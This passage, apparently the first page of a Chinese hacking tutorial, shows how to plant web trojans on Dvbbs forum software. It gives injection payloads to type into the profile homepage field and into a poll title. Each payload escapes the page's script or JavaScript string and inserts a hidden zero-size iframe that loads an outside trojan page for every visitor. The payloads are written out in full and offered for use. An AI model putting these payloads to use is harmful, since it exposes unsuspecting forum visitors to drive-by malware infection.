前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知。
相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:
CODE:
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org/"></IfraMe>
[Copy to clipboard]
在MSN中写入代码:
CODE:
<Script Language=JavaScript>var actioninfo3=’单帖屏蔽’
[Copy to clipboard]
其中http://www.wuzhou.org为你的网页
木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的
木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个
挂马方法-----投票
挂马。通过测试,发现动网的所有版本均存在这个
漏洞。
首先,我们发表一个投票看看。如图1

我们看一下源文件:
CODE:
<Script Language=JavaScript>var vote=’ssssssssss’;var votenum=’0’;var votetype=’0’;var voters=’0’;</Script>
[Copy to clipboard]
其中ssssssssss是我们自由写入的,那么我们能不能对源文件进行欺骗,从而让它运行我们的代码呢?打个比方,一个括号:(),当我们在()内写进)和(,那就变成了两个括号。道理是相同的,我们也可以这样进行代码欺骗。我们在发表投票中写入:
CODE:
’;var votenum=’0’;var votetype=’0’;var voters=’0’;</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote=’
[Copy to clipboard]
[1] [2] 下一页